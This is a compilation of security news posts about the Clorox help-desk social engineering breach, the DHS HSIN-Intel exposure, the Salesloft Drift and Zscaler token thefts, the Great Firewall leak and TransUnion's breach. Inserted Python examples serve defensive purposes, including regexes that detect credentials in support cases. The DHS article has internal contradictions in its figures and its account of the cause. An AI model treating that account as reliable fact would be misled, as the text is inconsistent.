
Clorox Blames $380M Breach on Service Desk Social Engineering, Sues Cognizant

 

In August 2023, the Scattered Spider group orchestrated a devastating social engineering attack against Clorox that resulted in approximately $380 million in damages, demonstrating how a simple phone call can lead to catastrophic business disruption.

Modus operandi 

The attackers bypassed sophisticated cybersecurity measures through old-fashioned social engineering, repeatedly calling Cognizant's service desk and impersonating locked-out Clorox employees. Rather than exploiting technical vulnerabilities, they manipulated human psychology, using calm, scripted conversations to convince frontline agents to reset passwords and multi-factor authentication without proper verification.

According to court filings, the attackers conducted thorough reconnaissance, collecting employee names, titles, recent hires, and internal ticket references to make their impersonation attempts more convincing. The legal complaint alleges that Cognizant agents violated agreed procedures by resetting credentials without properly authenticating callers first.

Devastating impact 

The breach caused operational paralysis at Clorox, with production systems taken offline, manufacturing paused, and manual order processing implemented. The company experienced significant shipment delays that depressed sales volumes, with the total financial impact reaching roughly $380 million, including $49 million in direct remedial costs and hundreds of millions in business-interruption losses.

Why outsourcing amplified risk

Outsourced help desks present unique vulnerabilities due to their broad cross-tenant privileges and high-volume workflows that can lead to shortcuts in verification processes. Large vendors handling numerous calls may experience "process drift," where agents prioritize getting users working over strict security verification. Additionally, third-party systems often create visibility gaps, with actions logged in separate systems that aren't fully integrated into customers' security monitoring.

Defense recommendations 

Security experts recommend treating help-desk resets as privileged operations requiring out-of-band verification through company-owned phone callbacks or emailed tokens. High-risk resets should mandate two-person approval and automatic manager notifications.

Organizations should implement automated telemetry to log every reset with immutable audit trails and alert on suspicious patterns like multiple resets from the same external number. Contract language with vendors must require technical controls, auditability, and regular social-engineering simulations to measure and improve verification processes.
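The telemetry recommendation above is concrete enough to show as detection logic. The following is an added example, not code from Clorox, Cognizant or any vendor: it runs three checks over constructed help-desk reset records (resets with no out-of-band verification recorded, several resets from one external number inside a time window, and an MFA reset followed shortly by a password reset for the same user). The record format, field names and thresholds are assumptions for the example; the MFA-then-password rule goes beyond the single pattern the post names.

```python
"""Detection logic over help-desk reset records, as an added example.

Constructed sample records (not from the Clorox/Cognizant case): one line per
credential or MFA reset, pipe-delimited as
timestamp|agent|target_user|reset_type|caller_number|verification_method
where an empty verification_method means no out-of-band check was recorded.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2023-08-10T09:02:11|agent17|jsmith|password|+1-555-0100|callback
2023-08-10T09:40:53|agent22|mlee|mfa|+1-555-0199|
2023-08-10T09:44:02|agent22|mlee|password|+1-555-0199|
2023-08-10T10:15:30|agent05|rkhan|mfa|+1-555-0199|
2023-08-10T11:03:44|agent09|tgarcia|password|+1-555-0142|email_token
2023-08-10T11:59:10|agent17|bchen|password|+1-555-0199|
"""

# Thresholds are assumptions for the example; tune them to real call volumes.
REPEAT_WINDOW = timedelta(hours=2)    # window for "same external number" clustering
REPEAT_THRESHOLD = 3                  # resets from one number inside the window
COMBO_WINDOW = timedelta(minutes=30)  # MFA reset followed by password reset


def parse_log(text):
    """Parse the pipe-delimited records into dicts with datetime timestamps."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, agent, user, kind, caller, verification = line.split("|")
        records.append({
            "ts": datetime.fromisoformat(ts),
            "agent": agent,
            "user": user,
            "kind": kind,
            "caller": caller,
            "verification": verification,
        })
    return records


def find_unverified(records):
    """Resets where the agent recorded no out-of-band verification at all."""
    return [(r["user"], r["kind"]) for r in records if not r["verification"]]


def find_repeat_callers(records, window=REPEAT_WINDOW, threshold=REPEAT_THRESHOLD):
    """Callers with >= threshold resets inside any sliding window of `window`."""
    by_caller = defaultdict(list)
    for r in records:
        by_caller[r["caller"]].append(r["ts"])
    alerts = {}
    for caller, times in by_caller.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[caller] = max(alerts.get(caller, 0), count)
    return alerts


def find_mfa_then_password(records, window=COMBO_WINDOW):
    """Users whose MFA reset was followed by a password reset within `window`.

    Resetting both factors in quick succession is the account-takeover shape;
    this rule generalises beyond the single-number pattern in the post.
    """
    by_user = defaultdict(list)
    for r in records:
        by_user[r["user"]].append(r)
    flagged = set()
    for user, recs in by_user.items():
        recs.sort(key=lambda r: r["ts"])
        for i, r in enumerate(recs):
            if r["kind"] != "mfa":
                continue
            for later in recs[i + 1:]:
                if later["kind"] == "password" and later["ts"] - r["ts"] <= window:
                    flagged.add(user)
                    break
    return sorted(flagged)


def run_detections(text=SAMPLE_LOG):
    """Run all three detections and return their findings."""
    records = parse_log(text)
    return {
        "unverified": find_unverified(records),
        "repeat_callers": find_repeat_callers(records),
        "mfa_then_password": find_mfa_then_password(records),
    }


if __name__ == "__main__":
    for name, finding in run_detections().items():
        print(f"{name}: {finding}")
```

On the constructed records this flags four unverified resets, one external number with three resets inside two hours, and one user whose MFA reset was followed within minutes by a password reset. In a real deployment the records would come from the vendor's ticketing or identity system, which is exactly the integration gap the post describes.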

Sensitive Intelligence Exposed in DHS Data Hub Security Lapse


 

A critical vulnerability in a central data hub of the Department of Homeland Security (DHS) is thought to have exposed highly sensitive data to a broad range of unauthorized users, raising serious questions about the integrity of federal data security.

An investigation by Wired revealed that the system, intended to serve as a secure repository consolidating intelligence and law enforcement data from multiple agencies, was compromised because its access controls were misconfigured. Instead of restricting classified material to properly cleared personnel, the flaw gave unauthorized parties, including adversarial actors, an open door into classified data.

Not only does the incident undermine the core purpose of the hub, which was designed to streamline and safeguard the intelligence-sharing process, but it also highlights the increasing risks and vulnerabilities that arise from the growing reliance of the federal government on vast, interconnected computer networks. 

Currently, it is estimated that 5,000 unauthorized individuals may have been able to access restricted data in some form or another. Despite this, officials at DHS have tried to minimize concerns by stressing that only a small number of interactions were flagged as potentially malicious after internal audits. 

However, given the scope of the exposure, the national security community is very concerned about the implications, especially since the compromised files contained operational intelligence linked to ongoing investigations. Such lapses have occurred before, including the 2018 breach in which over 247,000 records pertaining to DHS employees were stolen from a secure database, and the 2019 phishing attack on Oregon DHS that exposed 350,000 protected health information records.

Nevertheless, investigators in this case emphasize that the risk does not lie in stolen identities, but in the inadvertent visibility of intelligence information that adversaries could exploit to disrupt or undermine the government's operations. The DHS Cyber Safety Review Board, along with federal investigators, has been investigating since the incident came to light.

In their investigation, federal investigators cited systemic weaknesses within the department's IT infrastructure, particularly the reliance on outdated systems that are not integrated with modern cloud technology. An investigation revealed that the breach had been caused by an identity and access management (IAM) flaw in the DHS data hub framework. 

The data hub relied on a third-party vendor platform that had gone unpatched for over a year before the breach. By exploiting weak session tokens, unauthorized users were able to circumvent authentication protocols and gain read-only access to sensitive information.

In light of these findings, there has been renewed criticism regarding vendor accountability and the persistent disconnect between federal cybersecurity policies and how they are being implemented on the ground. It has been determined that a DHS internal memorandum, which Wired obtained via a Freedom of Information Act (FOIA) request, indicates that the exposure continued from March to May 2023. 

Meanwhile, the Office of Intelligence and Analysis (I&A) at DHS had misconfigured an online platform intended to facilitate restricted information exchange and the sharing of investigative leads. The system, HSIN-Intel, the intelligence section of the Homeland Security Information Network, was configured to allow access to "everyone" rather than only authorized members of the intelligence community.

As a result, hundreds of thousands of people with HSIN accounts across the country, including some with no connection to intelligence or law enforcement, were inadvertently granted access to restricted information. Those who gained unintended access included federal employees working in unrelated fields such as disaster response, private contractors, and even foreign government representatives who had been allowed onto the HSIN platform for other purposes.
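The failure described here is a grant to the wildcard group rather than to the intended community, and the damage is only visible once grants are expanded into the concrete accounts that can read each item. The following added example (not HSIN's software or data model; every account, community and resource name is constructed) performs that effective-access review: it expands group and user grants, compares the readers of each resource with the community that is supposed to see it, flags wildcard grants, and rolls up the out-of-community readers by affiliation the way the inquiry reported its numbers.

```python
"""Effective-access review for a sharing platform, as an added example.

Constructed model (not HSIN's real data model): accounts carry an affiliation
and a set of community memberships; each resource names the community that is
allowed to read it and the grants actually configured. The special group
'everyone' matches every account, which is the misconfiguration this catches.
"""
from collections import Counter

# Constructed directory of accounts.
ACCOUNTS = {
    "alice":  {"affiliation": "federal",            "communities": {"intel"}},
    "bob":    {"affiliation": "federal",            "communities": {"disaster_response"}},
    "carol":  {"affiliation": "private_sector",     "communities": {"critical_infra"}},
    "dmitri": {"affiliation": "foreign_government", "communities": {"partner_liaison"}},
    "erin":   {"affiliation": "state_local",        "communities": {"intel", "law_enforcement"}},
}

# Constructed resources: the allowed community and the grants actually configured.
RESOURCES = {
    "weekly-threat-brief":     {"community": "intel", "grants": ["group:intel"]},
    "hacking-campaign-report": {"community": "intel", "grants": ["group:everyone"]},
    "protest-assessment":      {"community": "intel", "grants": ["group:intel", "user:bob"]},
}


def members_of(group, accounts=ACCOUNTS):
    """Expand a group name to account names; 'everyone' is the wildcard group."""
    if group == "everyone":
        return set(accounts)
    return {name for name, info in accounts.items() if group in info["communities"]}


def effective_readers(resource, accounts=ACCOUNTS):
    """Union of every grant on the resource, expanded to concrete accounts."""
    readers = set()
    for grant in resource["grants"]:
        kind, _, name = grant.partition(":")
        if kind == "group":
            readers |= members_of(name, accounts)
        elif kind == "user" and name in accounts:
            readers.add(name)
    return readers


def review(resources=RESOURCES, accounts=ACCOUNTS):
    """Per resource: is a wildcard grant present, and who can read it but should not?"""
    findings = {}
    for name, res in resources.items():
        readers = effective_readers(res, accounts)
        allowed = members_of(res["community"], accounts)
        excess = readers - allowed
        findings[name] = {
            "granted_to_everyone": "group:everyone" in res["grants"],
            "excess_readers": sorted(excess),
            "excess_by_affiliation": dict(Counter(accounts[a]["affiliation"] for a in excess)),
        }
    return findings


def summarize(findings):
    """Roll up the review: which resources are over-exposed, and how many
    excess readers fall into each affiliation (the shape of the inquiry's numbers)."""
    by_affiliation = Counter()
    over_exposed = []
    for name, f in findings.items():
        if f["excess_readers"]:
            over_exposed.append(name)
        by_affiliation.update(f["excess_by_affiliation"])
    return {"over_exposed": sorted(over_exposed), "by_affiliation": dict(by_affiliation)}


if __name__ == "__main__":
    f = review()
    for name, detail in f.items():
        print(name, detail)
    print(summarize(f))
```

Note that the review catches the direct user grant on `protest-assessment` as well as the wildcard: "no `everyone` grant" is a necessary check, but only expanding to effective readers shows every path by which an out-of-community account reaches a product.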

In light of the revelations, civil liberties advocates have been sharply critical, with Spencer Reynolds, a lawyer at the Brennan Center for Justice, who obtained the internal memo through a Freedom of Information Act request and shared it with Wired, stating that it raises serious concerns over the department’s commitment to safeguarding the department’s most confidential information. According to Reynolds, DHS advertises HSIN as secure and claims the information it contains is highly sensitive, crucial to national security. 

However, this incident raises serious concerns about the department's dedication to information security. Many thousands of users have had access to information they were never supposed to receive. Beyond the trove of classified documents that were compromised, HSIN-Intel's holdings include investigative leads and tips ranging from reports on foreign hacking campaigns and disinformation operations to analyses of domestic protest movements and snippets of articles from international publications.

One cited example was a media report on demonstrations against the Atlanta Public Safety Training Center, commonly referred to as the "Stop Cop City" protests, in which coverage was favorable toward confrontational police tactics. Beyond the 1,525 improper accesses of 439 intelligence products, the DHS inquiry also found that 518 people from the private sector and 46 foreigners had improperly accessed the products.

Nearly 40 percent of the compromised materials concerned cybersecurity threats, such as state-sponsored hacking groups targeting government IT infrastructure. According to officials, some of the unauthorized US users who viewed the data would have qualified for access through formal channels but never obtained the proper approval. Technology professionals in both government and industry should heed the warning in this incident: during rapid digital transformation, safeguards often lag behind.

It has already been stated that there are similarities between this incident and the Johnson Controls malware attack of 2023, which, it is reported by SecurityAffairs, may have exposed DHS data through supply-chain vulnerabilities, highlighting similar systemic weaknesses as the misconfigurations that have been at the core of this incident. 

DHS has responded to this problem by engaging external cybersecurity firms to audit its platforms in an effort to make sure that a comprehensive review is being conducted. In addition, the DHS has been monitoring its platforms continuously in order to detect irregular access patterns in real time. In spite of this, Wired noted that long-term consequences may not be visible for years to come, underscoring the delicate balance federal agencies must strike between allowing data access for operational efficiency while safeguarding intelligence vital to national security at the same time. 

It is not only a single security lapse that has been committed by the Department of Homeland Security, but it is a reflection of a broader issue confronting modern governance as it becomes increasingly dependent on technology. The growing dependence on interconnected networks among federal agencies to coordinate intelligence operations and streamline operations has made even minor oversights in configurations or vendor management more likely to create national security vulnerabilities as the interconnected world continues to expand. 

There is a consensus that addressing such risks will require more than technological solutions such as stronger encryption, automated monitoring and patch management; it will also require cultural shifts within federal agencies that make cybersecurity a priority rather than just a compliance issue.

Better disclosure of breach information, tighter oversight of third-party vendors, and improved training for federal employees could all help strengthen resilience and rebuild public trust in systems designed to safeguard national interests. At the same time, governments, companies, and international partners should collaborate more closely against future threats, as adversaries increasingly exploit cross-border digital ecosystems with greater sophistication.

As the ten-year anniversary of the DHS breach draws closer, it may be seen as a moment of historical significance: an occasion to remember that secure information-sharing is a frontline defense for democratic institutions, not simply an administrative function.

Salesloft Hack Shows How Developer Breaches Can Spread

 



Salesloft, a popular sales engagement platform, has revealed that a breach of its GitHub environment earlier this year played a key role in a recent wave of data theft attacks targeting Salesforce customers.

The company explained that attackers gained access to its GitHub repositories between March and June 2025. During this time, intruders downloaded code, added unauthorized accounts, and created rogue workflows. These actions gave them a foothold that was later used to compromise Drift, Salesloft’s conversational marketing product. Drift integrates with major platforms such as Salesforce and Google Workspace, enabling businesses to automate chat interactions and sales pipelines.


How the breach unfolded

Investigators from cybersecurity firm Mandiant, who were brought in to assist Salesloft, found that the GitHub compromise was the first step in a multi-stage campaign. After the attackers established persistence, they moved into Drift’s cloud infrastructure hosted on Amazon Web Services (AWS). From there, they stole OAuth tokens, digital keys that allow applications to access user accounts without requiring passwords.

These stolen tokens were then exploited in August to infiltrate Salesforce environments belonging to multiple organizations. By abusing the access tokens, attackers were able to view and extract customer support cases. Many of these records contained sensitive information such as cloud service credentials, authentication tokens, and even Snowflake-related access keys.


Impact on organizations

The theft of Salesforce data affected a wide range of technology companies. Attackers specifically sought credentials and secrets that could be reused to gain further access into enterprise systems. According to Salesloft’s August 26 update, the campaign’s primary goal was credential theft rather than direct financial fraud.

Threat intelligence groups have tracked this operation under the identifier UNC6395. Meanwhile, reports also suggest links to known cybercrime groups, although conclusive attribution remains unsettled.


Response and recovery

Salesloft said it has since rotated credentials, hardened its defenses, and isolated Drift’s infrastructure to prevent further abuse. Mandiant confirmed that containment steps have been effective, with no evidence that attackers maintain ongoing access. Current efforts are focused on forensic review and long-term assurance.

Following weeks of precautionary suspensions, Salesloft has now restored its Salesforce integrations. The company has also published detailed instructions to help customers safely resume data synchronization.

The incident underlines the risks of supply-chain style attacks, where a compromise at one service provider can cascade into breaches at many of its customers. It underscores the importance of securing developer accounts, closely monitoring access tokens, and limiting sensitive data shared in support cases.

For organizations, best practices now include regularly rotating OAuth tokens, auditing third-party app permissions, and enforcing stronger segmentation between critical systems.
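The post notes that the stolen Salesforce support cases contained cloud credentials, tokens and access keys, and that organizations should limit sensitive data shared in support cases. One control for that is to scan case text for embedded secrets before it is stored. The following is an added example, not Salesloft's, Salesforce's or Mandiant's code: it combines the publicly documented AWS access key ID format, a labelled-secret pattern (`password=`, `token:` and similar), and a Shannon-entropy check for long random-looking strings, then redacts what it finds. The case text, the labelled-secret pattern and the entropy threshold are constructed for the example; the AWS key shown is Amazon's documented example key, not a live credential.

```python
"""Scan support-case text for embedded credentials before it is stored,
as an added example (not Salesloft's or Salesforce's code).

Detectors are constructed for the example: the public AWS access key ID
format (AKIA followed by 16 upper-case alphanumerics), labelled secrets such
as password= or token:, and long high-entropy strings. Matches are redacted so
the case can be kept while the secret is not.
"""
import math
import re
from collections import Counter

# (pattern, index of the group that holds the secret itself)
DETECTORS = {
    "aws_access_key_id": (re.compile(r"\bAKIA[0-9A-Z]{16}\b"), 0),
    "labelled_secret": (re.compile(
        r"(?i)\b(password|passwd|secret|token|api[_-]?key)\s*[=:]\s*(\S{8,})"), 2),
}
ENTROPY_TOKEN = re.compile(r"[A-Za-z0-9+/_\-]{32,}")
ENTROPY_THRESHOLD = 4.0  # bits per character; assumed value, tune per environment

# Constructed support-case body. The AWS key is Amazon's documented example key.
CASE_TEXT = """Hi, our sync job fails. Here is the config we use:
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
password=Correct-Horse-Battery-Staple-2025
The other job authenticates with x7Qp9ZkLm2Vn4RtY8wBc1HsDf3GjKa6NeUo5Pq0T
Thanks, ticket 4821"""


def shannon_entropy(s):
    """Bits of entropy per character of s (max log2 of the distinct-char count)."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def _overlaps(a, b):
    return a[0] < b[1] and b[0] < a[1]


def find_secrets(text):
    """Return (detector, start, end) spans, earliest first. Entropy hits that
    overlap a pattern hit are dropped so each secret is reported once."""
    findings = []
    for name, (rx, group) in DETECTORS.items():
        for m in rx.finditer(text):
            findings.append((name, m.start(group), m.end(group)))
    for m in ENTROPY_TOKEN.finditer(text):
        span = (m.start(), m.end())
        if shannon_entropy(m.group()) >= ENTROPY_THRESHOLD and not any(
                _overlaps(span, (s, e)) for _, s, e in findings):
            findings.append(("high_entropy_token", *span))
    return sorted(findings, key=lambda f: f[1])


def redact(text, findings):
    """Replace each finding's span, working backwards so offsets stay valid."""
    out = text
    for name, s, e in sorted(findings, key=lambda f: f[1], reverse=True):
        out = out[:s] + f"[REDACTED:{name}]" + out[e:]
    return out


def scrub_case(text=CASE_TEXT):
    """Return the detector names that fired and the redacted case text."""
    findings = find_secrets(text)
    return [f[0] for f in findings], redact(text, findings)


if __name__ == "__main__":
    kinds, cleaned = scrub_case()
    print(kinds)
    print(cleaned)
```

The labelled-secret detector redacts only the value after the `=` or `:` so the field name survives for the support engineer, and the entropy check is deliberately last so that a value already caught by a precise pattern is not reported twice. A real deployment would add patterns for the other secret types seen in the campaign and run the scrubber at case-creation time, not after the data has already been replicated into integrations.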


Great Firewall of China Compromised in Historic 600GB Data Exposure


 

It has been reported that on September 11, 2025, nearly 600 gigabytes of classified materials linked to the Great Firewall of China emerged online, a breach of China's closely guarded internet censorship machinery on a scale never seen before. The leaked cache, which experts have described as the largest exposure of internal GFW documents in history, provides a rare opportunity to take a closer look at Beijing's highly automated digital surveillance system.

The data was gathered from Geedge Networks, a company founded and led by Fang Binxing, one of the world's most renowned computer scientists, and from the MESA Lab at the Institute of Information Engineering of the Chinese Academy of Sciences; it comprises source code, internal communications, development logs, and archives of project management tools accumulated over many years.

According to researchers who examined the documents, the revelation not only confirms the sweep of China's domestic controls, but reveals how censorship and surveillance technology, packaged as deployable hardware and software systems, has been exported overseas. The documents show Geedge's services deployed not only in sensitive domestic regions such as Xinjiang, Jiangsu, and Fujian, but also to governments in Myanmar, Pakistan, Ethiopia, and Kazakhstan, with further signs that the company's services may be deployed under the Belt and Road Initiative.

A 500GB archive of server repositories, detailed manuals, and operational files is one detail of the breach that indicates not just a compromise of state secrets but also a glimpse into how China's digital authoritarian model has been refined and marketed for international use.

Two pivotal institutions at the heart of China's online censorship regime are referred to in the cache of leaked files: Geedge Networks and the MESA Lab of the Institute of Information Engineering under the Chinese Academy of Sciences. Geedge, led by its chief scientist Fang Binxing, widely known as the "Father of the Great Firewall", has been seen for decades as the technical brain behind the operation of the firewall system.

A forensic investigation into the incident indicates that the attackers exploited a misconfigured private code repository to gain access to backup snapshots, archived communications, and development environments. A single mirror archive of RPM packaging servers was estimated to account for 500 GB of the exposed material, alongside years' worth of documentation, JIRA project management data, and technical manuals.

In total, the breach exposed nearly 600 gigabytes of data. In the files, researchers found evidence that Geedge was not only operating in provinces such as Xinjiang, Jiangsu, and Fujian, which represent some of the worst cases of domestic censorship, but was also supplying censorship as a service to other countries under the Belt and Road Initiative.

Contracts and proposals detail the provision of keyword blacklists, real-time traffic monitoring, cloud-based filtering appliances, and other services to the governments of Myanmar, Pakistan, Ethiopia, and Kazakhstan, with diplomatic communications suggesting additional undisclosed customers.

In the leak, a parallel role also comes to light for MESA Lab, which was established in 2012 as the Processing Architecture Team for "Massive Effective Stream Analysis" and eventually became an international research centre worth millions of yuan. 

The lab's internal source code and development records expose sophisticated algorithms for packet inspection, dynamic rule enforcement, and evasion detection, including simulated testing against encrypted tunnels and circumvention tools.

The documents, which have been carefully reviewed by organisations such as GFW Report and Net4People on isolated systems, are seen as a groundbreaking intelligence breakthrough by analysts. They provide an unparalleled understanding of the mechanism of state-sponsored internet controls while raising important questions regarding the export of authoritarian surveillance techniques to the global marketplace. 

The leaked cache contains nearly 600 gigabytes and tens of thousands of files and repositories, which together provide a rare and intricate insight into the machinery of China's censorship system and its complex, comprehensive policies governing the internet. At its core lies a massive 500GB mirror archive of RPM packaging servers. This shows that, in addition to being a political construct, the Great Firewall is a highly engineered software ecosystem maintained to the same standard as a large, corporate-scale IT operation. Additional archives such as geedge_docs.tar.zst and mesalab_docs.tar.zst contain countless internal reports and research proposals.

A number of the files referencing projects such as “CTF-AWD,” “BRI,” and “CPEC” suggest connections and international collaborations that are based on the Belt and Road Initiative, while project management data and communication drafts show the coordination of researchers and engineers on a daily basis. 

Even though many documents appear mundane, such as reimbursement receipts and documents labelled simply "Print", they show that censorship is an institutionalised part of bureaucratic processes and procedures. A number of things distinguish this leak from other breaches, the most remarkable being its breadth and granularity. Instead of a few emails or whistleblower memos, this collection comprises raw operational information that reveals years of investment, research, and development.

Several independent researchers, including Net4People, Hackread.com, and others, have noted that the file tree itself tells a great deal about the Firewall's evolution into a distributed, export-ready system. The background materials also examine how the MESA Lab grew from a small research lab at the Chinese Academy of Sciences in 2012 into a multi-million dollar operation that contributed to national cybersecurity awards in 2016.

Originally created under the guidance of Fang Binxing, who is given credit for designing the Great Firewall, Geedge Networks quickly absorbed the talents of the MESA and has quickly emerged as one of the few private firms capable of supporting state censorship both domestically and internationally. 

While full analysis of the source code may take months, the initial revelations already confirm what many observers have long suspected: China's internet control infrastructure is neither static nor insular. It is a living system shaped by government contracts, academic research, and private enterprise, and increasingly packaged for export to other countries.

The hacktivist group behind the disclosure has warned that the files should only be examined in an isolated environment because they might contain embedded malware and tracking elements. Despite these dangers, researchers and rights advocates argue that the trove offers the chance to gain a comprehensive understanding of the Great Firewall, both in terms of how it works and how its influence is being systematically extended outside the country.

This unprecedented exposé of the Great Firewall's inner workings is far more than a breach: it marks an important turning point in the global debate around digital rights, sovereignty, and the export of surveillance technology. For governments, these files provide an unfiltered look at how authoritarian states operationalise censorship, transforming it into a scaled, almost commodified system capable of deployment well outside their own borders.

For researchers and civil society groups, this material is an invaluable resource for unravelling censorship mechanisms, developing countermeasures, and creating stronger tools to circumvent censorship.

In light of these revelations, policymakers around the world need to examine how Chinese surveillance infrastructure spreads through initiatives like the Belt and Road Initiative, weigh the geopolitical implications of supporting regimes that restrict freedom of expression, and take appropriate measures. Since the data carries potential security risks, it must be handled carefully.

However, its availability presents an excellent opportunity to improve transparency, accountability, and resilience against digital authoritarianism. Used responsibly, this leak could not only reshape the way people perceive China's censorship model but also help spark international efforts to safeguard the open internet.

Zscaler Confirms Data Breach Linked to Salesloft Drift Supply-Chain Attack

 

Cybersecurity firm Zscaler has revealed it suffered a data breach after attackers exploited a compromise in Salesloft Drift, an AI-driven Salesforce integration tool. The incident is part of a larger supply-chain attack in which stolen OAuth and refresh tokens were leveraged to gain unauthorized access to Salesforce environments across multiple organizations. 

Zscaler confirmed that its Salesforce instance was one of the targets, resulting in the exposure of sensitive customer details. According to the company, the information accessed by threat actors included customer names, job titles, business email addresses, phone numbers, and geographic details. In addition, data related to Zscaler product licensing, commercial agreements, and content from certain support cases was also stolen. 

While Zscaler has not disclosed the number of affected customers, it emphasized that the breach was limited to its Salesforce system and did not compromise any of its products, services, or underlying infrastructure. 

The company stated that the unauthorized data access primarily took place between August 13 and 16, 2025, with some attempts occurring earlier. Although Zscaler has not detected any misuse of the stolen data, it has urged its customers to remain cautious of phishing emails and social engineering campaigns that could exploit the compromised information. 

In response to the incident, Zscaler has taken several steps to mitigate risks, including revoking all Salesloft Drift integrations with Salesforce, rotating API tokens across its systems, and implementing stricter customer authentication protocols when handling support requests. 

An internal investigation into the full scope of the breach is ongoing. The attack has been linked to a campaign attributed to the threat group UNC6395, which was previously flagged by Google Threat Intelligence. This group is believed to have targeted Salesforce support cases to collect highly sensitive credentials such as AWS access keys, passwords, and Snowflake tokens. 

Google researchers also noted that the attackers attempted to cover their tracks by deleting query jobs, although audit logs remained available for review. The compromise of Salesloft Drift has had wide-reaching consequences across the SaaS ecosystem, impacting companies including Google, Cisco, Workday, Adidas, Qantas, Allianz Life, and LVMH subsidiaries. 

In many of these cases, attackers used vishing tactics to trick employees into authorizing malicious OAuth applications, enabling large-scale data theft later exploited in extortion schemes. 

Both Google and Salesforce have since suspended their Drift integrations while investigations continue. Security experts warn that this incident highlights the growing risks of supply-chain attacks and the urgent need for stronger oversight of third-party integrations.
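Both the Salesloft post above (rotate OAuth tokens, audit third-party app permissions) and this one (revoke all Drift integrations, rotate API tokens) come down to the same operational task: take an inventory of tokens issued to connected apps and decide, per token, whether to revoke, rotate or review it. The following added example is not Zscaler's, Salesloft's or Salesforce's tooling; the inventory rows, the 90-day rotation policy, the "broad scope" list and the app names other than Salesloft Drift are constructed for the example. It also revokes dormant tokens, which goes beyond what the posts list.

```python
"""Token inventory audit for third-party integrations, as an added example
(not Zscaler's, Salesloft's or Salesforce's tooling).

Constructed inventory: one row per OAuth/API token issued to a connected app,
with issue time, last use and granted scopes. The audit produces the actions
the posts describe: revoke tokens of a compromised integration, rotate tokens
past their maximum age, and flag over-broad scopes for review. It also revokes
dormant tokens, which goes beyond what the posts list.
"""
from datetime import datetime, timedelta

NOW = datetime(2025, 9, 1)              # fixed "now" so the example is deterministic
MAX_TOKEN_AGE = timedelta(days=90)      # assumed rotation policy
COMPROMISED_APPS = {"Salesloft Drift"}  # the integration named on the page
BROAD_SCOPES = {"full", "api", "refresh_token"}  # assumed "too much" scopes

INVENTORY = [  # constructed rows; app names other than Drift are invented
    {"token_id": "t-001", "app": "Salesloft Drift", "issued": datetime(2025, 3, 15),
     "last_used": datetime(2025, 8, 14), "scopes": {"api", "refresh_token"}},
    {"token_id": "t-002", "app": "Billing Sync", "issued": datetime(2025, 4, 1),
     "last_used": datetime(2025, 8, 30), "scopes": {"api"}},
    {"token_id": "t-003", "app": "HR Connector", "issued": datetime(2025, 8, 20),
     "last_used": datetime(2025, 8, 31), "scopes": {"read_contacts"}},
    {"token_id": "t-004", "app": "Legacy Report Tool", "issued": datetime(2024, 1, 10),
     "last_used": datetime(2024, 6, 1), "scopes": {"full"}},
]


def classify(token, now=NOW, max_age=MAX_TOKEN_AGE):
    """Return the list of actions a single token warrants, most severe first."""
    actions = []
    if token["app"] in COMPROMISED_APPS:
        actions.append("revoke:compromised_integration")
    if now - token["last_used"] > max_age:
        actions.append("revoke:dormant")
    if now - token["issued"] > max_age:
        actions.append("rotate:exceeds_max_age")
    if token["scopes"] & BROAD_SCOPES:
        actions.append("review:broad_scope")
    return actions


def audit(inventory=INVENTORY, now=NOW):
    """Classify every token in the inventory, keyed by token id."""
    return {t["token_id"]: classify(t, now) for t in inventory}


def plan(report):
    """Turn per-token actions into work queues. A token that is revoked needs
    no separate rotation or scope review, so it is dropped from those queues."""
    revoke = sorted(t for t, a in report.items() if any(x.startswith("revoke:") for x in a))
    rotate = sorted(t for t, a in report.items()
                    if t not in revoke and "rotate:exceeds_max_age" in a)
    review = sorted(t for t, a in report.items()
                    if t not in revoke and "review:broad_scope" in a)
    return {"revoke": revoke, "rotate": rotate, "review": review}


if __name__ == "__main__":
    report = audit()
    for token_id, actions in report.items():
        print(token_id, actions or ["ok"])
    print(plan(report))
```

The value of keeping the classification separate from the work plan is that the same report feeds both the immediate response (revoke the compromised integration's tokens first) and the steady-state hygiene the Salesloft post recommends (rotate by age, review scopes), so the one-off incident cleanup and the recurring audit are the same code path.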

Credit Bureau TransUnion Confirms Breach Impacting Millions


 

Amid growing threats to consumers' personal information, credit reporting giant TransUnion has announced a cybersecurity incident that exposed personal information of more than 4.4 million Americans. Several regulators and state attorneys general have confirmed that the breach took place on July 28, 2025, and was discovered just two days later by investigators.

Among the data exposed was sensitive information such as names, Social Security numbers, and dates of birth, held in a third-party application used by TransUnion in its U.S. consumer operations. In its statement, TransUnion said the breach was limited in scope and that its internal systems and core credit reporting databases were not impacted.

The company also stated that no credit reports or core financial records, information that could be highly valuable to fraudsters, were accessed. TransUnion filed notifications in Maine and Texas indicating that the incident involved a third-party platform reportedly linked to Salesforce, rather than TransUnion's own infrastructure.

Despite the company’s description of the exposure, which was limited to “some limited personal data”, the magnitude of the breach underscores the ongoing risks associated with external service providers in the financial services industry. 

Recent years have seen growing concern for credit bureaus as consumer information has become an increasingly attractive target for cybercriminals. This latest incident is another in a long string of security incidents that have impacted major financial institutions, highlighting the difficulty of safeguarding sensitive information across a complex digital ecosystem.

In addition to Experian and Equifax, TransUnion is one of the nation's "big three" credit reporting agencies, and together with them, they play an important role in shaping our nation's financial system by compiling detailed credit histories on nearly every consumer who has an active credit history. These files are used to create credit reports that lenders, landlords, and employers use in order to gauge a person's financial security, and they are also used to build widely known scoring models like FICO. 

These models produce the three-digit credit scores that lenders, landlords, and employers rely on. It is therefore natural for breaches involving such institutions to have a significant impact on consumers and the economy as a whole. In response to the latest incident, TransUnion has begun sending letters directly to affected individuals and has urged consumers to contact the fraud helpline at 1-800-516-4700, which is open on weekdays, to find out if they are in good standing.

In addition, experts suggest that consumers periodically review their credit reports from all three credit bureaus, which can be accessed for free once a week at AnnualCreditReport.com, to check for inaccuracies or signs that something is amiss. For further security, paid services like myFICO can track FICO scores in real time and monitor for fraud, while platforms like Credit Karma and WalletHub offer free VantageScore reports to subscribers who enrol.

The TransUnion company initially stated that there had been no compromise of credit files; however, subsequent disclosures told a much more troubling story. According to regulatory filings filed with the Texas Attorney General’s office, among the exposed data set were names, dates of birth, and Social Security numbers, which are some of the most sensitive identifiers in the world today. 

